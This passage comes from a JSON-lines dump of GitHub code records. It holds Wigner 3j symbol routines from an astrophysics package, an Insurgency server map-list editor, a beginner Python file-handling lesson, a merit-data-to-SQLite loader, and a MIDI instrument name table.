Can also lead to somewhat wrong answers\n sgns=np.ones_like(iis,dtype='int')*-1\n sgns[iis%2==0]=1\n\n b1=(j_3 - j_1 - m_2 +j_2*0)[x0]\n b2=(j_2 + m_2 +j_1*0+j_3*0)[x0]\n b3=(j_1-m_1 +j_2*0+j_3*0)[x0]\n b4=(j_3 - j_2 + m_1 +j_1*0)[x0]\n sumres_t=np.zeros_like(b1,dtype='float')\n\n for i in np.arange(len(iis)):\n ii=iis[i]\n x=np.logical_not(np.logical_or(ii<imin,ii>imax))\n log_den =( log_factorial(ii) +\n log_factorial( b1[x] + ii ) +\n log_factorial( b2[x] - ii) +\n log_factorial( b3[x] - ii) +\n log_factorial( b4[x] + ii ) +\n log_factorial(a[1][x] - ii) )\n sumres_ii=np.exp(sumres_t-log_den)*sgns[i] #FIXME: This has numerical issues.\n sumres_t[x]+=sumres_ii\n\n# sumres_t=np.exp(log_ressqrt+np.log(np.absolute(sumres_t)))*np.sign(sumres_t)\n\n prefid = np.ones_like(x0,dtype='int8') # (1 if (j_1 - j_2 - m_3) % 2 == 0 else -1)\n prefid[(j_1 - j_2 - m_3+j_3*0) % 2 == 1]=-1\n return sparse.COO(np.where(x0),data=sumres_t*prefid[x0]) #ressqrt taken inside sumres calc\n\n# def Wigner3j_parallel( m_1, m_2, m_3,j_1, j_2, j_3,ncpu=None):\n# if ncpu is None:\n# ncpu=cpu_count()-2\n# p=Pool(ncpu)\n# d_mat=sparse.stack(p.map( partial(Wigner3j, m_1, m_2, m_3,j_1, j_2), j_3,\n# chunksize=max(1,np.int(len(j_3)/ncpu/10))\n# ) )\n# p.close()\n# return d_mat[:,:,:,0].transpose((1,2,0))\n\n\n\ndef wigner_3j_2(j_1, j_2, j_3, m_1, m_2, m_3): \n #this and some helper functions below is a copy-paste of sympy function. We use it for testing.\n r\"\"\"\n Calculate the Wigner 3j symbol `\\operatorname{Wigner3j}(j_1,j_2,j_3,m_1,m_2,m_3)`.\n\n INPUT:\n\n - ``j_1``, ``j_2``, ``j_3``, ``m_1``, ``m_2``, ``m_3`` - integer or half integer\n\n OUTPUT:\n\n Rational number times the square root of a rational number.\n\n Examples\n ========\n\n >>> from sympy.physics.wigner import wigner_3j\n >>> wigner_3j(2, 6, 4, 0, 0, 0)\n sqrt(715)/143\n >>> wigner_3j(2, 6, 4, 0, 0, 1)\n 0\n\n It is an error to have arguments that are not integer or half\n integer values::\n\n sage: wigner_3j(2.1, 6, 4, 0, 0, 0)\n Traceback (most recent call last):\n ...\n ValueError: j values must be integer or half integer\n sage: wigner_3j(2, 6, 4, 1, 0, -1.1)\n Traceback (most recent call last):\n ...\n ValueError: m values must be integer or half integer\n\n NOTES:\n\n The Wigner 3j symbol obeys the following symmetry rules:\n\n - invariant under any permutation of the columns (with the\n exception of a sign change where `J:=j_1+j_2+j_3`):\n\n .. math::\n\n \\begin{aligned}\n \\operatorname{Wigner3j}(j_1,j_2,j_3,m_1,m_2,m_3)\n &=\\operatorname{Wigner3j}(j_3,j_1,j_2,m_3,m_1,m_2) \\\\\n &=\\operatorname{Wigner3j}(j_2,j_3,j_1,m_2,m_3,m_1) \\\\\n &=(-1)^J \\operatorname{Wigner3j}(j_3,j_2,j_1,m_3,m_2,m_1) \\\\\n &=(-1)^J \\operatorname{Wigner3j}(j_1,j_3,j_2,m_1,m_3,m_2) \\\\\n &=(-1)^J \\operatorname{Wigner3j}(j_2,j_1,j_3,m_2,m_1,m_3)\n \\end{aligned}\n\n - invariant under space inflection, i.e.\n\n .. math::\n\n \\operatorname{Wigner3j}(j_1,j_2,j_3,m_1,m_2,m_3)\n =(-1)^J \\operatorname{Wigner3j}(j_1,j_2,j_3,-m_1,-m_2,-m_3)\n\n - symmetric with respect to the 72 additional symmetries based on\n the work by [Regge58]_\n\n - zero for `j_1`, `j_2`, `j_3` not fulfilling triangle relation\n\n - zero for `m_1 + m_2 + m_3 \\neq 0`\n\n - zero for violating any one of the conditions\n `j_1 \\ge |m_1|`, `j_2 \\ge |m_2|`, `j_3 \\ge |m_3|`\n\n ALGORITHM:\n\n This function uses the algorithm of [Edmonds74]_ to calculate the\n value of the 3j symbol exactly. 
Note that the formula contains\n alternating sums over large factorials and is therefore unsuitable\n for finite precision arithmetic and only useful for a computer\n algebra system [Rasch03]_.\n\n REFERENCES:\n\n .. [Regge58] 'Symmetry Properties of Clebsch-Gordan Coefficients',\n T. Regge, Nuovo Cimento, Volume 10, pp. 544 (1958)\n\n .. [Edmonds74] 'Angular Momentum in Quantum Mechanics',\n A. R. Edmonds, Princeton University Press (1974)\n\n AUTHORS:\n\n - Jens Rasch (2009-03-24): initial version\n \"\"\"\n if int(j_1 * 2) != j_1 * 2 or int(j_2 * 2) != j_2 * 2 or \\\n int(j_3 * 2) != j_3 * 2:\n raise ValueError(\"j values must be integer or half integer\")\n if int(m_1 * 2) != m_1 * 2 or int(m_2 * 2) != m_2 * 2 or \\\n int(m_3 * 2) != m_3 * 2:\n raise ValueError(\"m values must be integer or half integer\")\n if m_1 + m_2 + m_3 != 0:\n return 0\n prefid = Integer((-1) ** int(j_1 - j_2 - m_3))\n m_3 = -m_3\n a1 = j_1 + j_2 - j_3\n if a1 < 0:\n return 0\n a2 = j_1 - j_2 + j_3\n if a2 < 0:\n return 0\n a3 = -j_1 + j_2 + j_3\n if a3 < 0:\n return 0\n if (abs(m_1) > j_1) or (abs(m_2) > j_2) or (abs(m_3) > j_3):\n return 0\n\n maxfact = max(j_1 + j_2 + j_3 + 1, j_1 + abs(m_1), j_2 + abs(m_2),\n j_3 + abs(m_3))\n# _calc_factlist(int(maxfact))\n\n argsqrt = Integer(_Factlist[int(j_1 + j_2 - j_3)] *\n _Factlist[int(j_1 - j_2 + j_3)] *\n _Factlist[int(-j_1 + j_2 + j_3)] *\n _Factlist[int(j_1 - m_1)] *\n _Factlist[int(j_1 + m_1)] *\n _Factlist[int(j_2 - m_2)] *\n _Factlist[int(j_2 + m_2)] *\n _Factlist[int(j_3 - m_3)] *\n _Factlist[int(j_3 + m_3)]) / \\\n _Factlist[int(j_1 + j_2 + j_3 + 1)]\n ressqrt = sy_sqrt(argsqrt)\n# print('sqrt',ressqrt.evalf())\n if ressqrt.is_complex:\n ressqrt = ressqrt.as_real_imag()[0]\n\n imin = max(-j_3 + j_1 + m_2, -j_3 + j_2 - m_1, 0)\n imax = min(j_2 + m_2, j_1 - m_1, j_1 + j_2 - j_3)\n sumres = 0\n for ii in range(int(imin), int(imax) + 1):\n den = _Factlist[ii] * \\\n _Factlist[int(ii + j_3 - j_1 - m_2)] * \\\n _Factlist[int(j_2 + m_2 - ii)] * \\\n _Factlist[int(j_1 - ii - m_1)] * \\\n _Factlist[int(ii + j_3 - j_2 + m_1)] * \\\n _Factlist[int(j_1 + j_2 - j_3 - ii)]\n sumres = sumres + Integer((-1) ** ii) / den\n# print(ii,sumres.evalf(),sy_log(den).evalf(24))\n# print(sumres.evalf())\n res = ressqrt * sumres * prefid\n return res\n\n_Factlist=[1,1]\ndef _calc_factlist(nn):\n r\"\"\"\n Function calculates a list of precomputed factorials in order to\n massively accelerate future calculations of the various\n coefficients.\n\n INPUT:\n\n - ``nn`` - integer, highest factorial to be computed\n\n OUTPUT:\n\n list of integers -- the list of precomputed factorials\n\n EXAMPLES:\n\n Calculate list of factorials::\n\n sage: from sage.functions.wigner import _calc_factlist\n sage: _calc_factlist(10)\n [1, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880, 3628800]\n \"\"\"\n global _Factlist\n if nn >= len(_Factlist):\n for ii in range(len(_Factlist), int(nn + 1)):\n _Factlist.append(_Factlist[ii - 1] * ii)\n return _Factlist[:int(nn) + 1]\n\n_calc_factlist(1000)\n\ndef calc_factlist(nn):\n return _calc_factlist(nn)\n\ndef wigner_3j_asym(j_1,j_2,j_3,m_1,m_2,m_3): #assume j1,j2>>j3... not very accurate.. only seems to work when j1==j2\n sj=(j_1+j_2+1)\n th=np.arccos((m_1-m_2)/sj)\n wd=wigner_d(m_3,j_2-j_1,np.atleast_1d(th),j_3)[0,0]\n return ((-1)**(j_2+m_2))*wd/np.sqrt(sj)\n\ndef wigner_3j_000(j_1,j_2,j_3,m_1,m_2,m_3): \n \"\"\"\n This is the function we use to compute wigner_3j matrices for the case of \n m1=m2=m3=0. 
Algorithm from Hivon+ 2002\n \"\"\"\n J=j_1+j_2+j_3\n a1 = j_1 + j_2 - j_3\n a2 = j_1 - j_2 + j_3\n a3 = -j_1 + j_2 + j_3\n x=a1<0\n x=np.logical_or(x,a2<0)\n x=np.logical_or(x,a3<0)\n x=np.logical_or(x,J%2==1)\n# print(x)\n \n logwj=log_factorial(J/2)\n logwj-=log_factorial(J/2-j_1)\n logwj-=log_factorial(J/2-j_2)\n logwj-=log_factorial(J/2-j_3)\n logwj-=0.5*log_factorial(J+1)\n logwj+=0.5*log_factorial(J-2*j_1)\n logwj+=0.5*log_factorial(J-2*j_2)\n logwj+=0.5*log_factorial(J-2*j_3)\n logwj[x]=-308\n wj=(-1)**(np.int32(J/2))*np.exp(logwj) #0, when J/2 is not int\n wj[x]=0\n# x=J%2==1 #already applied in calling functions\n# wj[x]*=0\n return np.real(wj)\n\ndef wigner_3j_3(asym_fact,m1,m2,m3,js):\n \"\"\"\n Attempt to speed up calculations by approximating general wigner matrices with the case of m1=m2=m3=0.\n Does not work very well. \n \"\"\"\n if np.all(np.array(js)>np.absolute([m1,m2,m3])*asym_fact) and np.sum(js)%2==0:\n return np.float32(wigner_3j_000(js[0],js[1],js[2],m1,m2,m3))\n return np.float32(wigner_3j(js[0],js[1],js[2],m1,m2,m3)) #.evalf() #this is calling sympy function not Wigner3j\n\nfrom itertools import product as Comb\nimport time\ndef Wigner3j_parallel( m_1, m_2, m_3,j_1, j_2, j_3,ncpu=None,asym_fact=np.inf):\n \"\"\"\n To compute wigner matrices in parallel. Depricated. See functions in Gen_wig_3j*.py files.\n \"\"\"\n if ncpu is None:\n ncpu=cpu_count()-2\n\n t1=time.time()\n j_max=np.amax(j_1.max()+j_2.max()+j_3.max()+1)\n _calc_factlist(j_max)\n\n n1=len(j_1)\n n2=len(j_2)\n n3=len(j_3)\n\n c=np.array(np.meshgrid(j_1,j_2,j_3,indexing='ij')).T.reshape(-1,3) #only needed to put cuts below. Otherwise Comb is better\n\n# print('cmax',np.amax(c,axis=0))\n\n x=c[:,0]+c[:,1]-c[:,2]>=0\n x*=c[:,0]-c[:,1]+c[:,2]>=0\n x*=-c[:,0]+c[:,1]+c[:,2]>=0\n\n marr=np.array([m_1,m_2,m_3])\n\n# x*=(c>=np.abs(marr)).prod(axis=1)\n x*=abs(m_1) <= c[:,0]\n x*=abs(m_2) <= c[:,1]\n x*=abs(m_3) <= c[:,2]\n\n if np.all(marr==0):\n x*=(c[:,0]+c[:,1]+c[:,2])%2==0\n elif np.all(c>=np.absolute(marr)*asym_fact):\n x*=(c[:,0]+c[:,1]+c[:,2])%2==0\n\n c=c[x]\n\n x2=c>=np.absolute(marr)*asym_fact\n x2=x2.prod(axis=1)==1\n\n t2=time.time()\n t3=t2\n dd=np.zeros((n1,n2,n3),dtype='float32')\n\n if np.all(marr==0) or np.all(x2):\n d_mat=wigner_3j_000(c[:,0],c[:,1],c[:,2],m_1,m_2,m_3)\n indx1=np.searchsorted(j_1,c[:,0])\n indx2=np.searchsorted(j_2,c[:,1])\n indx3=np.searchsorted(j_3,c[:,2])\n dd[indx1,indx2,indx3]=d_mat\n\n else:\n d_mat=wigner_3j_000(c[x2][:,0],c[x2][:,1],c[x2][:,2],m_1,m_2,m_3)\n indx1=np.searchsorted(j_1,c[x2][:,0]) #FIXME: check this\n indx2=np.searchsorted(j_2,c[x2][:,1])\n indx3=np.searchsorted(j_3,c[x2][:,2])\n dd[indx1,indx2,indx3]=d_mat\n\n t3=time.time()\n\n if not np.all(x2):\n c=c[~x2]\n p=Pool(ncpu)\n d_mat2=p.map(partial(wigner_3j_3,asym_fact, m_1, m_2, m_3),c,chunksize=100)\n p.close()\n p.join()\n indx1=np.searchsorted(j_1,c[:,0])\n indx2=np.searchsorted(j_2,c[:,1])\n indx3=np.searchsorted(j_3,c[:,2])\n dd[indx1,indx2,indx3]=d_mat2\n t4=time.time()\n print(j_3,j_1.max(),j_2.max(),'done','wig time,size: ',t4-t3,c.size,np.amax(c,axis=0))\n tf=time.time()\n# print(j_3,j_1.max(),j_2.max(),'done',t2-t1,t3-t2,tf-t3,tf-t1)\n return dd\n# c=Comb(j_1,j_2,j_3) #slower\n# d_mat=p.map(partial(wigner_3j_3, m_1, m_2, m_3),c,chunksize=100)\n# d_mat=np.array(d_mat).reshape(n1,n2,n3) #when not putting any cuts on c\n# return d_mat\n\n\n\"\"\"\nFollowing are helper functions for a recursive algorithm implemented below in wig3j_recur.\n\"\"\"\ndef A_J(j,j2,j3,m2,m3):\n 
out=np.float64(j**2-(j2-j3)**2)\n x=j**2<(j2-j3)**2\n out[x]=0\n out=out**.5\n out*=((j2+j3+1)**2-j**2)**.5\n out*=(j**2-(m2+m3)**2)**.5\n return out\n\ndef B_J(j,j2,j3,m2,m3):\n out=np.float64((m2+m3)*(j2*(j2+1)-j3*(j3+1)))\n out-=(m2-m3)*j*(j+1)\n out*=2*j+1\n return out\n\ndef X_Np1(j,j2,j3,m2,m3): #X_n+1\n return j*A_J(j+1,j2,j3,m2,m3)\n\ndef X_N(j,j2,j3,m2,m3): #X_n+1\n return B_J(j,j2,j3,m2,m3)\n\ndef X_Nm1(j,j2,j3,m2,m3): #X_n+1\n return (j+1)*A_J(j,j2,j3,m2,m3)\n\n\ndef wig3j_recur(j1,j2,m1,m2,m3,j3_outmax=None):\n \"\"\"\n Using recursion relation to compute wigner matrices. Works well. Validated with the sympy function.\n Reference is Luscombe, James H. 1998, Physical Review E.\n \"\"\"\n# assert m3==-m1-m2\n \n if (abs(m1) > j1) or (abs(m2) > j2) or m1+m2+m3!=0:\n return 0\n\n j3_min=np.absolute(j1-j2)\n j3_max=j1+j2+1 #j3_max is j1+j2, +1 for 0 indexing\n \n j3=np.arange(j3_max)\n \n if j3_outmax is None:\n j3_outmax=j3_max\n \n wig_out=np.zeros(max(j3_max,j3_outmax))\n \n if j3_min>j3_outmax:\n return wig_out[:j3_outmax]#.reshape(1,1,j3_outmax)\n\n wig_out[j3_min]=1#wigner_3j(j1,j2,j3_min,m1,m2,m3)\n if j3_min==0: #in this case the recursion as implemented doesnot work (all zeros). use sympy function.\n wig_out[j3_min]=wigner_3j(j1,j2,j3_min,m1,m2,m3)\n wig_out[j3_min+1]=wigner_3j(j1,j2,j3_min+1,m1,m2,m3) #not strictly needed when j3_min>0\n \n x_Np1=X_Np1(j3,j2,j1,m1,m2)*-1 #j==j3\n x_N=X_N(j3,j2,j1,m1,m2) #j==j3\n x_Nm1=X_Nm1(j3,j2,j1,m1,m2) #j==j3\n \n for i in np.arange(j3_min,j3_max):\n if x_Np1[i]==0:\n continue\n wig_out[j3[i+1]]=x_Nm1[i]*wig_out[j3[i-1]]+x_N[i]*wig_out[j3[i]]\n wig_out[j3[i+1]]/=x_Np1[i] \n \n Norm=np.sum((2*j3+1)*(wig_out[:j3_max]**2))\n wig_out/=Norm**.5\n \n if np.sign(wig_out[j1+j2])!=np.sign((-1)**(j3_min)):\n wig_out*=-1\n \n #FIXME: this commented out part is for validation against sympy. Should implement it properly as test.\n# if j3_min==0 and not np.isclose(Norm,1): #in this case we started recursion with exact values at j3_min and hence norm should be 1.\n# print(\"Norm problem: \",j1,j2,j3_min,Norm,wig_out[:j3_max],)\n# else:\n# tt=wigner_3j(j1,j2,j3_min+1,m1,m2,m3) # This is only for testing\n# tt=np.float(tt)\n# if not np.isclose(wig_out[j3_min+1],tt):\n# print('j3min+1 comparison problem: ',j1,j2,j3_min+1,tt,wig_out[j3_min+1])\n \n \n# xxi=np.random.randint(j3_min+1,j3_max-1) #randomly compare a value with sympy calculation\n# wig_out2=wigner_3j(j1,j2,j3[xxi],m1,m2,m3)\n# try:\n# wig_out2=wig_out2.evalf()\n# print('random test ',xxi,wig_out[xxi],wig_out2)\n# except Exception as err:\n# print('warning, random test failed', err)\n# pass\n\n\n return wig_out[:j3_outmax]#.reshape(j3_outmax,1,1)\n","repo_name":"sukhdeep2/SkyLens","sub_path":"skylens/wigner_functions.py","file_name":"wigner_functions.py","file_ext":"py","file_size_in_byte":20949,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"30514974686","text":"from util.settings_manager import ServerSettings, ServerSettingsException\nfrom util.install_server import InsurgencyServerInstaller, InsurgencyInstallerException\nfrom util.map_manager import MapManager, MapManagerException\n\nimport argparse\n\ndef start_server():\n '''Start the server.'''\n # Check installation status\n if not InsurgencyServerInstaller.is_installed():\n print(\"The Insurgency: Sandstorm server binaries do not appear to be downloaded. 
Attempting to download.\")\n installer = InsurgencyServerInstaller()\n installer.install_is_server()\n\n # TODO: Finish server config/start routine\n\ndef map_list_create(map_manager: MapManager):\n valid = False\n while not valid:\n list_name = input(\"Time to create a map list! What should the list be called? \")\n \n if map_manager.has_list_called(list_name):\n print(\"There is already a list by that name, please delete the list first or choose another name.\")\n\n else:\n valid = True\n map_manager.create_map_list(list_name)\n map_list_loop(map_manager, list_name)\n\ndef map_list_loop(map_manager: MapManager, list_name):\n '''Loop through adding maps to a list.'''\n\n map_loop_help = \"\"\"\nCOMMANDS:\n \"(h)elp\": List commands.\n \"(m)aps\": List map names.\n \"(s)cenarios\": List scenarios that work with the selected map. *This can only be used if a map is selected.*\n \"(d)one\": End the current scenario list or map list.\n\nTIPS:\n - You can enter more than one map or scenario at a time -- just separate each one with commas. For instance, this is a valid way to enter these maps all at once: Town, Farmhouse, Mountain\n - If you're not sure which scenarios work with the map you selected, type \"scenarios\".\n - All commands can be written as their first letter as a form of shorthand. You can pull up this page with just \"h\".\n \"\"\"\n\n print(\"You will enter a map name, followed by a list of gamemodes on that map. Type \\\"help\\\" for some commands that might help you, or \\\"done\\\" to end the map entering process.\")\n\n user_input = \"\"\n while user_input.lower() != \"done\" or user_input != 'd':\n user_input = input(\"Enter the name of a map or type \\\"help\\\" for commands that could help you: \")\n\n if user_input.lower() == \"help\" or user_input == \"h\":\n print(map_loop_help)\n\n elif user_input.lower() == \"maps\" or user_input == \"m\":\n print(\"All valid map names:\")\n for m in map_manager.get_all_maps():\n print(m)\n\n elif user_input.lower() == \"done\" or user_input == \"d\":\n print(\"Map entry complete.\")\n break\n\n else:\n for map_name in user_input.split(\",\"):\n map_name = map_name.strip()\n map_list_edit_entry(map_manager, list_name, map_name)\n\n\ndef map_list_edit_entry(map_manager: MapManager, list_name, map_name):\n\n valid = False\n while not valid:\n if map_name not in map_manager.get_all_maps():\n print(\"\\\"{}\\\" is not a valid map name or command. Type \\\"maps\\\" to see the list of valid map names, or \\\"help\\\" for commands.\".format(map_name))\n continue\n\n user_input = input(\"Which scenarios would you like to include for {}? \".format(map_name))\n\n if user_input.lower() == \"scenarios\" or user_input == \"s\":\n print(\"Valid scenarios for {}:\".format(map_name))\n for scenario in map_manager.get_friendly_map_scenarios(map_name):\n print(scenario)\n\n elif user_input.lower() == \"done\" or user_input == \"d\":\n continue\n\n else:\n for scen_name in user_input.split(\",\"):\n scen_name = scen_name.strip()\n scen_name = scen_name.replace(\" \", \"_\")\n if scen_name not in map_manager.get_map_scenarios(map_name):\n print(\"\\\"{}\\\" is not a valid scenario name or command. 
Type \\\"scenarios\\\" to see the list of valid scenario names, or \\\"help\\\" for commands.\".format(scen_name))\n continue\n\n map_manager.append_to_map_list(list_name, map_manager.get_scenario_name(map_name, scen_name))\n map_manager.save_map_lists()\n print(\"Added all scenarios to the map list.\")\n valid = True\nif __name__ == \"__main__\":\n map_manager = MapManager()\n try:\n map_manager.load_map_lists()\n except MapManagerException:\n print(\"Could not load map list. This is only a problem if you expect maps to be saved already.\")\n\n map_list_create(map_manager)\n print(map_manager.get_map_list(\"FirstMapList\"))\n","repo_name":"nstgeorge/Inservency","sub_path":"inservency_maplisteditor.py","file_name":"inservency_maplisteditor.py","file_ext":"py","file_size_in_byte":4638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21228045590","text":"my_list = [i ** 2 for i in range(1, 11)]\n\nmy_file = open(\"output.txt\", \"w\")\n\n# Add your code below!\nfor i in my_list:\n my_file.write(str(i) + \"\\n\")\n\nmy_file.close()\n\n# read\nmy_file = open(\"output.txt\", \"r\")\nprint(my_file.read())\nmy_file.close()\n\n# read line\nmy_file = open(\"text.txt\", \"r\")\nprint(my_file.readline())\nprint(my_file.readline())\nprint(my_file.readline())\nmy_file.close()\n\n# close file\n# Use a file handler to open a file for writing\nwrite_file = open(\"text.txt\", \"w\")\n\n# Open the file for reading\nread_file = open(\"text.txt\", \"r\")\n\n# Write to the file\nwrite_file.write(\"Not closing files is VERY BAD.\")\n\nwrite_file.close()\n\n# Try to read from the file\nprint(read_file.read())\nread_file.close()\n\n# with ...as...\nwith open(\"text.txt\", \"w\") as my_file:\n my_file.write(\"Success!\")\n\nif my_file.closed:\n my_file.close()\n\n\nprint(my_file.closed)\n","repo_name":"AiaRup/she-codes-basic-python","sub_path":"lesson-12/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11546170688","text":"#dependencies\nimport pandas as pd\nimport numpy as np\n#from datetime import datetime #this library is not required\nfrom sqlalchemy import create_engine, Column, Integer, String, Float\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.ext.declarative import declarative_base\n\n#path of sqlite file goes here in relation to current file\ndatabase_path = 'merit.sqlite'\n\n#create DataFrame from mert transaction history file on loyce.club\ndata = pd.read_csv('http://loyce.club/Merit/merit.all.txt', sep='\t', header=None)\n#rename columns\ndata = data.rename(columns={0: 'time', 1: 'number_of_merit', 2:'message_id', 3:'UID_from', 4: 'UID_to'})\n\n\n\n#connect to sqllite db\nengine = create_engine(f\"sqlite:///{database_path}\")\nsession = Session(engine)\n\n\n\n#use default declarative base function as variable 'Base'\nBase = declarative_base()\n\n#define table schema\nclass Merit(Base):\n __tablename__ = 'merit'\n id = Column(Integer, primary_key=True)#this is a column with a unique value for each transaction\n time = Column(Integer) #unix time\n number_of_merit = Column(Integer)\n message_id = Column(String(25))\n uid_from = Column(Integer)\n uid_to = Column(Integer)\n\n\n#create table in sqllite file\nBase.metadata.create_all(engine)\n\n\n#set first value for id as 1\nid1 = 1\n#loop through DataFrame to add each row in the DataFrame to the SQLlite DB.\nfor x in np.arange(len(data)):\n 
session.add(Merit(id=id1, time=int(data['time'][x]), number_of_merit=int(data['number_of_merit'][x]),\n message_id=data['message_id'][x], uid_from=int(data['UID_from'][x]), uid_to=int(data['UID_to'][x])))\n id1 = id1 + 1 #after the row is added, the id1 variable value will be increased by one\n #will commit rows in batches of 100\n if len(session.new) > 100:\n session.commit()\nsession.commit() #commit last batch of rows\n\n\n#check to make sure all rows were successfully imported\nif len(session.query(Merit.id).all()) == len(data):\n print(f'All the data from the DataFrame was successfully imported into a SQL file found at {database_path}')\nelse:\n print(f'There was a problem importing all the merit transactions and {len(data) - len(session.query(Merit.id).all())} were not imported. Troubleshooting is required')\n","repo_name":"numberedprime7/merit-api","sub_path":"merit2sql.py","file_name":"merit2sql.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40816410318","text":"# -*- coding: utf-8 -*-\n\"\"\"\nhttps://mitpress.mit.edu/sicp/full-text/book/book-Z-H-16.html#%_thm_2.62\n\"\"\"\nfrom Chapter2.exercises.exercise2_61 import adjoin_set\nfrom Chapter2.themes.lisp_list_structured_data import lisp_list, print_lisp_list\nfrom Chapter2.themes.sequences_as_conventional_interfaces import accumulate\n\n\ndef union_set(set1, set2):\n \"\"\"Computes the union of set1 and set2 in O(n)\"\"\"\n return accumulate(adjoin_set, set1, set2)\n\n\ndef run_the_magic():\n s1 = lisp_list(1, 2, 3, 6, 10, 45, 56, 77, 90, 110, 120, 140, 150)\n s2 = lisp_list(1, 5, 26, 121)\n print_lisp_list(union_set(s1, s2))\n\n from timeit import Timer\n t1 = Timer(stmt='union_set(%(s1)s, %(s2)s)' % locals(),\n setup='from Chapter2.exercises.exercise2_62 import union_set')\n t2 = Timer(stmt='union_set(%(s1)s, %(s2)s)' % locals(),\n setup='from Chapter2.exercises.exercise2_59 import union_set')\n\n time = t1.timeit()\n print('average time (ordered list): %s' % time)\n\n time = t2.timeit()\n print('average_time (unordered list): %s' % time)\n\n\nif __name__ == \"__main__\":\n run_the_magic()\n","repo_name":"aoyono/sicpy","sub_path":"Chapter2/exercises/exercise2_62.py","file_name":"exercise2_62.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6146630459","text":"names = {\n 0:\"Yamaha Grand Piano\",\n 1:\"Bright Yamaha Grand\",\n 2:\"Electric Piano\",\n 3:\"Honky Tonk\",\n 4:\"Rhodes EP\",\n 5:\"Legend EP 2\",\n 6:\"Harpsichord\",\n 7:\"Clavinet\",\n 8:\"Celesta\",\n 9:\"Glockenspiel\",\n 10:\"Music Box\",\n 11:\"Vibraphone\",\n 12:\"Marimba\",\n 13:\"Xylophone\",\n 14:\"Tubular Bells\",\n 15:\"Dulcimer\",\n 16:\"DrawbarOrgan\",\n 17:\"Percussive Organ\",\n 18:\"Rock Organ\",\n 19:\"Church Organ\",\n 20:\"Reed Organ\",\n 21:\"Accordian\",\n 22:\"Harmonica\",\n 23:\"Bandoneon\",\n 24:\"Nylon String Guitar\",\n 25:\"Steel String Guitar\",\n 26:\"Jazz Guitar\",\n 27:\"Clean Guitar\",\n 28:\"Palm Muted Guitar\",\n 29:\"Overdrive Guitar\",\n 30:\"Distortion Guitar\",\n 31:\"Guitar Harmonics\",\n 32:\"Acoustic Bass\",\n 33:\"Fingered Bass\",\n 34:\"Picked Bass\",\n 35:\"Fretless Bass\",\n 36:\"Slap Bass\",\n 37:\"Pop Bass\",\n 38:\"Synth Bass 1\",\n 39:\"Synth Bass 2\",\n 40:\"Violin\",\n 41:\"Viola\",\n 42:\"Cello\",\n 43:\"Contrabass\",\n 44:\"Tremolo\",\n 45:\"Pizzicato Section\",\n 46:\"Harp\",\n 47:\"Timpani\",\n 
48:\"Strings\",\n 49:\"Slow Strings\",\n 50:\"Synth Strings 1\",\n 51:\"Synth Strings 2\",\n 52:\"Ahh Choir\",\n 53:\"Ohh Voices\",\n 54:\"Synth Voice\",\n 55:\"Orchestra Hit\",\n 56:\"Trumpet\",\n 57:\"Trombone\",\n 58:\"Tuba\",\n 59:\"Muted Trumpet\",\n 60:\"French Horns\",\n 61:\"Brass Section\",\n 62:\"Synth Brass 1\",\n 63:\"Synth Brass 2\",\n 64:\"Soprano Sax\",\n 65:\"Alto Sax\",\n 66:\"Tenor Sax\",\n 67:\"Baritone Sax\",\n 68:\"Oboe\",\n 69:\"English Horn\",\n 70:\"Bassoon\",\n 71:\"Clarinet\",\n 72:\"Piccolo\",\n 73:\"Flute\",\n 74:\"Recorder\",\n 75:\"Pan Flute\",\n 76:\"Bottle Chiff\",\n 77:\"Shakuhachi\",\n 78:\"Whistle\",\n 79:\"Ocarina\",\n 80:\"Square Lead\",\n 81:\"Saw Wave\",\n 82:\"Calliope Lead\",\n 83:\"Chiffer Lead\",\n 84:\"Charang\",\n 85:\"Solo Vox\",\n 86:\"Fifth Sawtooth Wave\",\n 87:\"Bass & Lead\",\n 88:\"Fantasia\",\n 89:\"Warm Pad\",\n 90:\"Polysynth\",\n 91:\"Space Voice\",\n 92:\"Bowed Glass\",\n 93:\"Metal Pad\",\n 94:\"Halo Pad\",\n 95:\"Sweep Pad\",\n 96:\"Ice Rain\",\n 97:\"Soundtrack\",\n 98:\"Crystal\",\n 99:\"Atmosphere\",\n100:\"Brightness\",\n101:\"Goblin\",\n102:\"Echo Drops\",\n103:\"Star Theme\",\n104:\"Sitar\",\n105:\"Banjo\",\n106:\"Shamisen\",\n107:\"Koto\",\n108:\"Kalimba\",\n109:\"BagPipe\",\n110:\"Fiddle\",\n111:\"Shenai\",\n112:\"Tinker Bell\",\n113:\"Agogo\",\n114:\"Steel Drums\",\n115:\"Woodblock\",\n116:\"Taiko Drum\",\n117:\"Melodic Tom\",\n118:\"Synth Drum\",\n119:\"Reverse Cymbal\",\n120:\"Fret Noise\",\n121:\"Breath Noise\",\n122:\"Sea Shore\",\n123:\"Bird Tweet\",\n124:\"Telephone\",\n125:\"Helicopter\",\n126:\"Applause\",\n127:\"Gun Shot\"}\n\ndef name_for(i):\n return names.get(i, \"Instrument \" + str(i))\n","repo_name":"betaveros/voxx","sub_path":"midi_names.py","file_name":"midi_names.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"73540825531","text":"from django.urls import path\nfrom . 
